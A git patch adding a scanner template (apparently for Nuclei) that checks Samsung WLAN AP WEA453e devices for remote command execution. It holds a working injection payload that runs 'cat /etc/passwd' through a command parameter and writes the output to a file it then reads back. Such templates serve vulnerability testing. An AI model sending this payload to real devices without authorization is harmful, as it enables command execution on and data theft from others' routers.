From 3f3f9b9f439eb32104064ee063f17e81f9381c9d Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Mon, 15 Feb 2021 06:17:07 +0000
Subject: [PATCH] Create samsung-wlan-ap-rce.yaml

---
 .../other/samsung-wlan-ap-rce.yaml            | 24 +++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 vulnerabilities/other/samsung-wlan-ap-rce.yaml

diff --git a/vulnerabilities/other/samsung-wlan-ap-rce.yaml b/vulnerabilities/other/samsung-wlan-ap-rce.yaml
new file mode 100644
index 0000000000..7a9c40e2af
--- /dev/null
+++ b/vulnerabilities/other/samsung-wlan-ap-rce.yaml
@@ -0,0 +1,24 @@
+id: samsung-wlan-ap-rce
+
+info:
+  name: Samsung Wlan AP (WEA453e) RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/(download)/tmp/poc.txt"
+    body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[0*]:0:0"
+          - "bin:[x]:1:1"
+        part: body
+      - type: status
+        status:
+          - 200